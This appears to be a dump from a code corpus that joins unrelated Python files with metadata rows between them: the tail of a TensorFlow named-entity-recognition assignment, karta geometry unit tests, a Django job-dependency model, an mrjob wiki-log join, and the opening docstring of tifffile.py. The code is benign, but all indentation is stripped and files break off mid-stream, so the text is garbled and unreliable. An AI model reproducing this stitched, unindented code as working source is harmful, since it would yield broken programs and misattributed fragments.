if dropout is not None:
feed_dict[self.dropout_placeholder] = dropout
### END YOUR CODE
return feed_dict
def add_embedding(self):
"""Add embedding layer that maps from vocabulary to vectors.
Creates an embedding tensor (of shape (len(self.wv), embed_size). Use the
input_placeholder to retrieve the embeddings for words in the current batch.
(Words are discrete entities. They need to be transformed into vectors for use
in deep-learning. Although we won't do so in this problem, in practice it's
useful to initialize the embedding with pre-trained word-vectors. For this
problem, using the default initializer is sufficient.)
Hint: This layer should use the input_placeholder to index into the
embedding.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: See following link to understand what -1 in a shape means.
https://www.tensorflow.org/versions/r0.8/api_docs/python/array_ops.html#reshape
Hint: Check the last slide from the TensorFlow lecture.
Hint: Here are the dimensions of the variables you will need to create:
L: (len(self.wv), embed_size)
Returns:
window: tf.Tensor of shape (-1, window_size*embed_size)
"""
# The embedding lookup is currently only implemented for the CPU
with tf.device('/cpu:0'):
### YOUR CODE HERE
embedding = tf.get_variable('Embedding', [len(self.wv), self.config.embed_size])
window = tf.nn.embedding_lookup(embedding, self.input_placeholder)
window = tf.reshape(
window, [-1, self.config.window_size * self.config.embed_size])
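      # Shape walk-through (illustrative, not from the original source):
      # with window_size=3 and embed_size=50, a batch of B windows indexes
      # into the (len(self.wv), 50) embedding to give a (B, 3, 50) tensor,
      # reshaped here to (B, 150) for the hidden layer.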
### END YOUR CODE
return window
def add_model(self, window):
"""Adds the 1-hidden-layer NN.
Hint: Use a variable_scope (e.g. "Layer") for the first hidden layer, and
another variable_scope (e.g. "Softmax") for the linear transformation
preceding the softmax. Make sure to use the xavier_weight_init you
defined in the previous part to initialize weights.
Hint: Make sure to add in regularization and dropout to this network.
Regularization should be an addition to the cost function, while
dropout should be added after both variable scopes.
Hint: You might consider using a tensorflow Graph Collection (e.g
"total_loss") to collect the regularization and loss terms (which you
will add in add_loss_op below).
Hint: Here are the dimensions of the various variables you will need to
create
W: (window_size*embed_size, hidden_size)
b1: (hidden_size,)
U: (hidden_size, label_size)
b2: (label_size)
https://www.tensorflow.org/versions/r0.7/api_docs/python/framework.html#graph-collections
Args:
window: tf.Tensor of shape (-1, window_size*embed_size)
Returns:
output: tf.Tensor of shape (batch_size, label_size)
"""
### YOUR CODE HERE
with tf.variable_scope('Layer1', initializer=xavier_weight_init()) as scope:
W = tf.get_variable(
'W', [self.config.window_size * self.config.embed_size,
self.config.hidden_size])
b1 = tf.get_variable('b1', [self.config.hidden_size])
h = tf.nn.tanh(tf.matmul(window, W) + b1)
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(W))
with tf.variable_scope('Layer2', initializer=xavier_weight_init()) as scope:
U = tf.get_variable('U', [self.config.hidden_size, self.config.label_size])
b2 = tf.get_variable('b2', [self.config.label_size])
y = tf.matmul(h, U) + b2
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(U))
output = tf.nn.dropout(y, self.dropout_placeholder)
### END YOUR CODE
return output
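# How the 'total_loss' collection ties add_model and add_loss_op together
# (a sketch of the mechanism, not additional model code): each
# 0.5 * l2 * l2_loss(W) term added above is a scalar tensor, and add_loss_op
# later sums them together with the cross-entropy via
#
#   tf.add_n(tf.get_collection('total_loss'))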
def add_loss_op(self, y):
"""Adds cross_entropy_loss ops to the computational graph.
Hint: You can use tf.nn.softmax_cross_entropy_with_logits to simplify your
implementation. You might find tf.reduce_mean useful.
Args:
y: A tensor of shape (batch_size, n_classes) containing the logits.
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(y, self.labels_placeholder))
tf.add_to_collection('total_loss', cross_entropy)
loss = tf.add_n(tf.get_collection('total_loss'))
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Hint: Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE
optimizer = tf.train.AdamOptimizer(self.config.lr)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
### END YOUR CODE
return train_op
def __init__(self, config):
"""Constructs the network using the helper functions defined above."""
self.config = config
self.load_data(debug=False)
self.add_placeholders()
window = self.add_embedding()
y = self.add_model(window)
self.loss = self.add_loss_op(y)
self.predictions = tf.nn.softmax(y)
one_hot_prediction = tf.argmax(self.predictions, 1)
correct_prediction = tf.equal(
tf.argmax(self.labels_placeholder, 1), one_hot_prediction)
self.correct_predictions = tf.reduce_sum(tf.cast(correct_prediction, 'int32'))
self.train_op = self.add_training_op(self.loss)
def run_epoch(self, session, input_data, input_labels,
shuffle=True, verbose=True):
orig_X, orig_y = input_data, input_labels
dp = self.config.dropout
# We're interested in keeping track of the loss and accuracy during training
total_loss = []
total_correct_examples = 0
total_processed_examples = 0
total_steps = len(orig_X) / self.config.batch_size
for step, (x, y) in enumerate(
data_iterator(orig_X, orig_y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=shuffle)):
feed = self.create_feed_dict(input_batch=x, dropout=dp, label_batch=y)
loss, total_correct, _ = session.run(
[self.loss, self.correct_predictions, self.train_op],
feed_dict=feed)
total_processed_examples += len(x)
total_correct_examples += total_correct
total_loss.append(loss)
##
if verbose and step % verbose == 0:
sys.stdout.write('\r{} / {} : loss = {}'.format(
step, total_steps, np.mean(total_loss)))
sys.stdout.flush()
if verbose:
sys.stdout.write('\r')
sys.stdout.flush()
return np.mean(total_loss), total_correct_examples / float(total_processed_examples)
def predict(self, session, X, y=None):
"""Make predictions from the provided model."""
# If y is given, the loss is also calculated
# We deactivate dropout by setting it to 1
dp = 1
losses = []
results = []
if np.any(y):
data = data_iterator(X, y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
else:
data = data_iterator(X, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
for step, (x, y) in enumerate(data):
feed = self.create_feed_dict(input_batch=x, dropout=dp)
if np.any(y):
feed[self.labels_placeholder] = y
loss, preds = session.run(
[self.loss, self.predictions], feed_dict=feed)
losses.append(loss)
else:
preds = session.run(self.predictions, feed_dict=feed)
predicted_indices = preds.argmax(axis=1)
results.extend(predicted_indices)
return np.mean(losses), results
def print_confusion(confusion, num_to_tag):
"""Helper method that prints confusion matrix."""
# Summing top to bottom gets the total number of tags guessed as T
total_guessed_tags = confusion.sum(axis=0)
# Summing left to right gets the total number of true tags
total_true_tags = confusion.sum(axis=1)
print
print confusion
for i, tag in sorted(num_to_tag.items()):
prec = confusion[i, i] / float(total_guessed_tags[i])
recall = confusion[i, i] / float(total_true_tags[i])
print 'Tag: {} - P {:2.4f} / R {:2.4f}'.format(tag, prec, recall)
def calculate_confusion(config, predicted_indices, y_indices):
"""Helper method that calculates confusion matrix."""
confusion = np.zeros((config.label_size, config.label_size), dtype=np.int32)
for i in xrange(len(y_indices)):
correct_label = y_indices[i]
guessed_label = predicted_indices[i]
confusion[correct_label, guessed_label] += 1
return confusion
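# Worked example for calculate_confusion (doctest-style; illustrative, and
# the exact numpy repr can vary by platform):
#
#   >>> class Cfg(object): label_size = 2
#   >>> calculate_confusion(Cfg, [0, 1, 0], [0, 1, 1])
#   array([[1, 0],
#          [1, 1]], dtype=int32)
#
# Rows index the true label and columns the guessed label, matching the
# axis convention used in print_confusion above.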
def save_predictions(predictions, filename):
"""Saves predictions to provided file."""
with open(filename, "wb") as f:
for prediction in predictions:
f.write(str(prediction) + "\n")
def test_NER():
"""Test NER model implementation.
You can use this function to test your implementation of the Named Entity
Recognition network. When debugging, set max_epochs in the Config object to 1
so you can rapidly iterate.
"""
config = Config()
with tf.Graph().as_default():
model = NERModel(config)
init = tf.initialize_all_variables()
saver = tf.train.Saver()
with tf.Session() as session:
best_val_loss = float('inf')
best_val_epoch = 0
session.run(init)
for epoch in xrange(config.max_epochs):
print 'Epoch {}'.format(epoch)
start = time.time()
###
train_loss, train_acc = model.run_epoch(session, model.X_train,
model.y_train)
val_loss, predictions = model.predict(session, model.X_dev, model.y_dev)
print 'Training loss: {}'.format(train_loss)
print 'Training acc: {}'.format(train_acc)
print 'Validation loss: {}'.format(val_loss)
if val_loss < best_val_loss:
best_val_loss = val_loss
best_val_epoch = epoch
if not os.path.exists("./weights"):
os.makedirs("./weights")
saver.save(session, './weights/ner.weights')
if epoch - best_val_epoch > config.early_stopping:
break
###
confusion = calculate_confusion(config, predictions, model.y_dev)
print_confusion(confusion, model.num_to_tag)
print 'Total time: {}'.format(time.time() - start)
saver.restore(session, './weights/ner.weights')
print 'Test'
print '=-=-='
print 'Writing predictions to q2_test.predicted'
_, predictions = model.predict(session, model.X_test, model.y_test)
save_predictions(predictions, "q2_test.predicted")
if __name__ == "__main__":
test_NER()
|
mit
| -2,195,417,113,203,144,000
| 37.136919
| 93
| 0.652904
| false
| 3.674441
| true
| false
| false
|
fortyninemaps/karta
|
tests/vector_predicate_tests.py
|
1
|
11300
|
""" Unit tests for vector geometry predicate methods """
from __future__ import division
import unittest
import numpy as np
from karta.vector.geometry import (Point, Line, Polygon,
Multipoint, Multiline, Multipolygon)
from karta.crs import (Cartesian, SphericalEarth, LonLatWGS84)
from karta.errors import CRSError
class TestUnaryPredicates(unittest.TestCase):
def test_poly_clockwise(self):
p = Polygon([(0,0), (0,1), (1,1), (1,0)])
self.assertTrue(p.isclockwise())
return
def test_poly_counterclockwise(self):
p = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertFalse(p.isclockwise())
return
def test_poly_polar(self):
p = Polygon([(0.0, 80.0), (30.0, 80.0), (60.0, 80.0), (90.0, 80.0),
(120.0, 80.0), (150.0, 80.0), (180.0, 80.0),
(-150.0, 80.0), (-120.0, 80.0), (-90.0, 80.0),
(-60.0, 80.0), (-30.0, 80.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(0.0, 85.0, 0.0), (90.0, 85.0, 0.0), (180.0, 85.0, 0.0),
(-90.0, 85.0, 0.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=SphericalEarth)
self.assertFalse(p.ispolar())
p = Polygon([(-80, 0), (-50, -10), (20, -8), (35, -17), (55, 15),
(-45, 18), (-60, 12)], crs=LonLatWGS84)
self.assertFalse(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=Cartesian)
self.assertRaises(CRSError, p.ispolar)
return
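# For reference, isclockwise() is conventionally decided by the sign of the
# shoelace (signed-area) sum -- a minimal sketch, not necessarily karta's
# implementation:
#
#   def _signed_area(verts):
#       return 0.5 * sum(x0 * y1 - x1 * y0
#                        for (x0, y0), (x1, y1)
#                        in zip(verts, verts[1:] + verts[:1]))
#
# A negative signed area means clockwise vertex order in a y-up frame,
# which is what the first two tests above exercise.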
class TestBinaryPredicates(unittest.TestCase):
def test_line_intersection(self):
line0 = Line([(0.0, 0.0), (3.0, 3.0)])
line1 = Line([(0.0, 3.0), (3.0, 0.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(1.5, 1.5)]))
return
def test_line_intersection2(self):
# test lines that have overlapping bounding boxes, but don't cross
# -----
# | -----
# | |
# ----- |
# -----
line0 = Line([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
line1 = Line([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertFalse(line0.intersects(line1))
return
def test_poly_intersection(self):
# test polygons formed exactly as in test_line_intersection2, except
# the rings are implicitly closed
# -----
# | --x--
# | . . |
# --x-- |
# -----
poly0 = Polygon([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
poly1 = Polygon([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertTrue(poly0.intersects(poly1))
self.assertEqual(poly0.intersections(poly1), Multipoint([(0.0, 1.0), (1.0, 3.0)]))
return
def test_line_intersection_horizontal(self):
line0 = Line([(-2.5, 2.5), (2.5, 2.5)])
line1 = Line([(0.0, 0.0), (1.0, 5.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(0.5, 2.5)]))
return
def test_line_intersection_vertical(self):
line0 = Line([(2.5, 2.5), (2.5, -2.5)])
line1 = Line([(1.5, 2.5), (3.5, -2.5)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(2.5, 0.0)]))
return
def test_intersection_polygons(self):
poly0 = Polygon([(0, 0), (2, 0), (3, 1), (2, 1), (2, 2), (1, 0)])
poly1 = Polygon([(-1, -1), (1, -1), (1, 1), (-1, 1)])
self.assertTrue(poly0.intersects(poly1))
return
def test_line_intersects_geographical1(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-39.0, 34.0), (-39.0, 37.5)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical2(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-42.0, 34.0), (-41.0, 37.5)], crs=SphericalEarth)
self.assertFalse(line1.intersects(line2))
return
def test_line_intersects_geographical3(self):
# checks to make sure geodesics are handled
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (1.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical4(self):
# catches possible bugs in handling vertical segments on sweepline
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (0.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical5(self):
# checks that coordinates are normalized
line1 = Line([(-10.0, 20.0), (-30.0, 20.0)], crs=SphericalEarth)
line2 = Line([(340.0, 10.0), (340.0, 30.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_poly_contains1(self):
# trivial cases
pt0 = Point((-0.5, 0.92))
unitsquare = Polygon([(0.0,0.0), (1.0,0.0), (1.0,1.0), (0.0,1.0)])
self.assertFalse(unitsquare.contains(pt0))
pt1 = Point((0.125, 0.875))
self.assertTrue(unitsquare.contains(pt1))
x = np.arange(-4, 5)
y = x**2
line = Line([(x_,y_) for x_,y_ in zip(x, y)], crs=Cartesian)
bbox = Polygon([(-2.5, 2.5), (2.5, 2.5), (2.5, -2.5), (-2.5, -2.5)],
crs=Cartesian)
self.assertEqual(list(filter(bbox.contains, line)),
[Point((-1, 1)), Point((0, 0)), Point((1, 1))])
return
def test_poly_contains2(self):
# test some hard cases
diamond = Polygon([(0,0), (1,1), (2,0), (1, -1)])
self.assertFalse(diamond.contains(Point((2, 1))))
self.assertTrue(diamond.contains(Point((1, 0))))
self.assertFalse(diamond.contains(Point((2.5, 0))))
self.assertFalse(diamond.contains(Point((0, -1))))
self.assertFalse(diamond.contains(Point((2, -1))))
return
def test_poly_contains3(self):
# case where point is on an edge (should return true)
square = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertTrue(square.contains(Point([0.5, 0])))
self.assertTrue(square.contains(Point([0, 0.5])))
return
def test_poly_contains4(self):
# hippie star
theta = np.linspace(0, 2*np.pi, 361)[:-1]
r = 10*np.sin(theta*8) + 15
x = np.cos(theta) * r + 25
y = np.sin(theta) * r + 25
polygon = Polygon(zip(x, y))
# causes naive cross-product methods to fail
pt = Point((28.75, 25.625))
self.assertTrue(polygon.contains(pt))
return
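# The star above defeats naive sign-of-cross-product containment tests
# because it is highly non-convex. A robust contains() typically uses an
# even-odd (ray-casting) parity count -- sketched here for intuition only,
# not as karta's actual algorithm:
#
#   def _crossings(pt, verts):
#       x, y = pt
#       n = 0
#       for (x0, y0), (x1, y1) in zip(verts, verts[1:] + verts[:1]):
#           if (y0 > y) != (y1 > y):  # edge straddles the horizontal ray
#               if x < x0 + (y - y0) * (x1 - x0) / (y1 - y0):
#                   n += 1
#       return n  # odd => inside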
def test_poly_contains_polar(self):
p = Polygon([(0, 80), (45, 80), (90, 80), (135, 80), (180, 80),
(225, 80), (270, 80), (315, 80)],
crs=SphericalEarth)
self.assertTrue(p.contains(Point((45, 85), crs=SphericalEarth)))
self.assertFalse(p.contains(Point((45, 75), crs=SphericalEarth)))
return
def test_within_distance(self):
line = Line([(0,0), (1,1), (3,1)])
pt = Point((1,1.5))
self.assertTrue(line.within_distance(pt, 0.6))
self.assertFalse(line.within_distance(pt, 0.4))
return
def test_multipoint_within_bbox(self):
vertices = [(float(x),float(y)) for x in range(-10,11)
for y in range(-10,11)]
ans = [v for v in vertices if (-5.0<v[0]<5.0) and (-4.0<v[1]<6.0)]
mp = Multipoint(vertices)
sub = mp.within_bbox((-5.0, -4.0, 5.0, 6.0))
self.assertEqual(sub, Multipoint(ans))
return
def test_multipoint_within_polygon(self):
np.random.seed(42)
x = (np.random.random(100) - 0.5) * 180.0
y = (np.random.random(100) - 0.5) * 30.0
xp = [-80, -50, 20, 35, 55, -45, -60]
yp = [0, -10, -8, -17, 15, 18, 12]
poly = Polygon(zip(xp, yp), crs=LonLatWGS84)
mp = Multipoint(zip(x, y), crs=LonLatWGS84)
subset = mp.within_polygon(poly)
excluded = [pt for pt in mp if pt not in subset]
self.assertTrue(all(poly.contains(pt) for pt in subset))
self.assertFalse(any(poly.contains(pt) for pt in excluded))
return
def test_multiline_touching_line(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
line = Line([(-30, -40), (11, -30), (10, 22), (-10, 50)])
touching = multiline.touching(line)
self.assertEqual(len(touching), 4)
return
def test_multipolygon_touching_line(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[10,0],[10,10],[0,10]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
line = Line([(-40, -35), (-15, -30), (30, 5), (10, 32), (-15, 17)])
touching = multipolygon.touching(line)
self.assertEqual(len(touching), 10)
return
def test_multiline_touching_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multiline.touching(poly)
self.assertEqual(len(touching), 12)
return
def test_multipolygon_touching_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multipolygon.touching(poly)
self.assertEqual(len(touching), 14)
return
def test_multiline_within_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multiline.within(poly)
self.assertEqual(len(within), 8)
return
def test_multipolygon_within_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multipolygon.within(poly)
self.assertEqual(len(within), 8)
return
if __name__ == "__main__":
unittest.main()
|
mit
| 7,244,258,512,799,947,000
| 38.788732
| 90
| 0.524071
| false
| 3.049933
| true
| false
| false
|
ChrisCooper/pipeline-nanny
|
taskmaster/models.py
|
1
|
3179
|
from django.db import models
class JobGroup(models.Model):
name = models.TextField()
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
def new_job(self, **args):
return Job.objects.create(group=self, **args)
def __repr__(self):
return "<Job group: {name} ({n_jobs} jobs)>".format(name=self.name, n_jobs=self.jobs.count())
def __str__(self):
return self.__repr__()
#def ready_jobs(self):
#return self.jobs.
class Job(models.Model):
name = models.TextField()
group = models.ForeignKey('JobGroup', related_name='jobs')
child_jobs = models.ManyToManyField('self', symmetrical=False, related_name='parent_jobs')
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
command = models.TextField()
stdout_file_location = models.TextField()
stderr_file_location = models.TextField()
WAITING = 0
READY = 1
RUNNING = 2
COMPLETED = 3
ERRORED = 4
KILLED = 5
STATUSES = (
(WAITING, 'Waiting'), # waiting on parent jobs
(READY, 'Ready'), # Can be started any time
(RUNNING, 'Running'), # Has been started
(COMPLETED, 'Completed'), # Exited with zero code
(ERRORED, 'Errored-out'), # Exited with a non-zero status
(KILLED, 'Killed'), # Used too many resources and was killed
)
status = models.IntegerField(choices=STATUSES, default=READY)
def __repr__(self):
return "<{status} Job: {name}, {n_parents} parents, {n_children} children>".format(
status=self.get_status_display(),
name=self.name,
n_parents=self.parent_jobs.count(),
n_children=self.child_jobs.count())
def add_child(self, dependant_job):
if dependant_job == self:
raise InvalidDependencyException("Error: Can't add a job as its own child. Job is {0}".format(self))
if self.depends_on(dependant_job):
raise InvalidDependencyException("Error: Dependency loops are not allowed. {0} already depends on {1}".format(self, dependant_job))
if dependant_job in self.child_jobs.all():
raise InvalidDependencyException("Error: Child job has already been added. {1} already depends on {0}".format(self, dependant_job))
if self.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child to a parent job that's already started. {0} already running (child: {1})".format(self, dependant_job))
if dependant_job.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child job that's already started. {1} already running (parent: {0})".format(self, dependant_job))
self.child_jobs.add(dependant_job)
dependant_job.status = Job.WAITING
self.save()
dependant_job.save()
def add_parent(self, prerequisite_job):
prerequisite_job.add_child(self)
def add_parents(self, prerequisite_jobs):
for job in prerequisite_jobs:
self.add_parent(job)
def add_children(self, dependent_jobs):
for job in dependent_jobs:
self.add_child(job)
def depends_on(self, job):
if (job in self.parent_jobs.all()):
return True
for dependency in self.parent_jobs.all():
if dependency.depends_on(job):
return True
return False
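# depends_on() above walks the parent graph recursively and can revisit
# shared ancestors. An equivalent iterative sketch with a visited set
# (an illustration, not part of the model's API):
#
#   def depends_on_iter(self, job):
#       stack, seen = list(self.parent_jobs.all()), set()
#       while stack:
#           parent = stack.pop()
#           if parent == job:
#               return True
#           if parent.pk not in seen:
#               seen.add(parent.pk)
#               stack.extend(parent.parent_jobs.all())
#       return False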
class InvalidDependencyException(Exception):
pass
|
mit
| 4,321,678,611,756,257,300
| 34.322222
| 164
| 0.705253
| false
| 3.211111
| false
| false
| false
|
explorerwjy/jw_anly502
|
PS03/join3.py
|
1
|
1856
|
#!/usr/bin/env python2
# To get started with the join,
# try creating a new directory in HDFS that has both the fwiki data AND the maxmind data.
import mrjob
from mrjob.job import MRJob
from mrjob.step import MRStep
from weblog import Weblog # imports class defined in weblog.py
import os
import re
import sys
import heapq
class FwikiMaxmindJoin(MRJob):
def mapper(self, _, line):
# Is this a weblog file, or a MaxMind GeoLite2 file?
filename = mrjob.compat.jobconf_from_env("map.input.file")
if "top1000ips_to_country.txt" in filename:
self.increment_counter("Status","top1000_ips_to_country file found",1)
try:
(ipaddr, country) = line.strip().split("\t")
yield ipaddr, "+"+country
except ValueError as e:
pass
else:
try:
o = Weblog(line)
except ValueError:
sys.stderr.write("Invalid Logfile line :{}\n".format(line))
return
if o.wikipage() == "Main_Page":
yield o.ipaddr, line
def reducer(self, key, values):
country = None
for v in values:
if v[0:1] == '+':
country = v[1:]
continue
if not country:
self.increment_counter("Warning","No Country Found", 1)
continue
o = Weblog(v)
yield "Geolocated",[o.date,country,v]
def mapper2(self,key,value):
country = value[1]
#country=re.findall('\[\"([^\d."]+)\",',value)[0]
yield country,1
def reducer2(self,key,values):
yield key,sum(values)
def mapper3(self,key,value):
yield "TOP10",(value,key)
def reducer3(self,key,values):
for count in heapq.nlargest(10,values):
yield key,count
def steps(self):
return [
MRStep(mapper=self.mapper,reducer=self.reducer),
MRStep(mapper=self.mapper2,reducer=self.reducer2),
MRStep(mapper=self.mapper3,reducer=self.reducer3)
]
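# Typical mrjob invocations for this three-step job (paths are illustrative):
#
#   python join3.py top1000ips_to_country.txt fwiki.log   # local runner
#   python join3.py -r hadoop hdfs:///data/fwiki/*        # on Hadoop
#
# mapper() reads map.input.file from the jobconf, so inputs must come from
# named files for the join side-detection to work.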
if __name__=="__main__":
FwikiMaxmindJoin.run()
|
cc0-1.0
| 5,963,624,779,465,666,000
| 26.701493
| 89
| 0.651401
| false
| 2.979133
| false
| false
| false
|
jni/cellom2tif
|
cellom2tif/tifffile.py
|
1
|
173408
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tifffile.py
# Copyright (c) 2008-2014, Christoph Gohlke
# Copyright (c) 2008-2014, The Regents of the University of California
# Produced at the Laboratory for Fluorescence Dynamics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holders nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Read and write image data from and to TIFF files.
Image and metadata can be read from TIFF, BigTIFF, OME-TIFF, STK, LSM, NIH,
SGI, ImageJ, MicroManager, FluoView, SEQ and GEL files.
Only a subset of the TIFF specification is supported, mainly uncompressed
and losslessly compressed 2**(0 to 6) bit integer, 16, 32 and 64-bit float,
grayscale and RGB(A) images, which are commonly used in bio-scientific imaging.
Specifically, reading JPEG and CCITT compressed image data or EXIF, IPTC, GPS,
and XMP metadata is not implemented.
Only primary info records are read for STK, FluoView, MicroManager, and
NIH image formats.
TIFF, the Tagged Image File Format, is under the control of Adobe Systems.
BigTIFF allows for files greater than 4 GB. STK, LSM, FluoView, SGI, SEQ, GEL,
and OME-TIFF, are custom extensions defined by Molecular Devices (Universal
Imaging Corporation), Carl Zeiss MicroImaging, Olympus, Silicon Graphics
International, Media Cybernetics, Molecular Dynamics, and the Open Microscopy
Environment consortium respectively.
For command line usage run ``python tifffile.py --help``
:Author:
`Christoph Gohlke <http://www.lfd.uci.edu/~gohlke/>`_
:Organization:
Laboratory for Fluorescence Dynamics, University of California, Irvine
:Version: 2014.08.24
Requirements
------------
* `CPython 2.7 or 3.4 <http://www.python.org>`_
* `Numpy 1.8.2 <http://www.numpy.org>`_
* `Matplotlib 1.4 <http://www.matplotlib.org>`_ (optional for plotting)
* `Tifffile.c 2013.11.05 <http://www.lfd.uci.edu/~gohlke/>`_
(recommended for faster decoding of PackBits and LZW encoded strings)
Notes
-----
The API is not stable yet and might change between revisions.
Tested on little-endian platforms only.
Other Python packages and modules for reading bio-scientific TIFF files:
* `Imread <http://luispedro.org/software/imread>`_
* `PyLibTiff <http://code.google.com/p/pylibtiff>`_
* `SimpleITK <http://www.simpleitk.org>`_
* `PyLSM <https://launchpad.net/pylsm>`_
* `PyMca.TiffIO.py <http://pymca.sourceforge.net/>`_ (same as fabio.TiffIO)
* `BioImageXD.Readers <http://www.bioimagexd.net/>`_
* `Cellcognition.io <http://cellcognition.org/>`_
* `CellProfiler.bioformats
<https://github.com/CellProfiler/python-bioformats>`_
Acknowledgements
----------------
* Egor Zindy, University of Manchester, for cz_lsm_scan_info specifics.
* Wim Lewis for a bug fix and some read_cz_lsm functions.
* Hadrien Mary for help on reading MicroManager files.
References
----------
(1) TIFF 6.0 Specification and Supplements. Adobe Systems Incorporated.
http://partners.adobe.com/public/developer/tiff/
(2) TIFF File Format FAQ. http://www.awaresystems.be/imaging/tiff/faq.html
(3) MetaMorph Stack (STK) Image File Format.
http://support.meta.moleculardevices.com/docs/t10243.pdf
(4) Image File Format Description LSM 5/7 Release 6.0 (ZEN 2010).
Carl Zeiss MicroImaging GmbH. BioSciences. May 10, 2011
(5) File Format Description - LSM 5xx Release 2.0.
http://ibb.gsf.de/homepage/karsten.rodenacker/IDL/Lsmfile.doc
(6) The OME-TIFF format.
http://www.openmicroscopy.org/site/support/file-formats/ome-tiff
(7) UltraQuant(r) Version 6.0 for Windows Start-Up Guide.
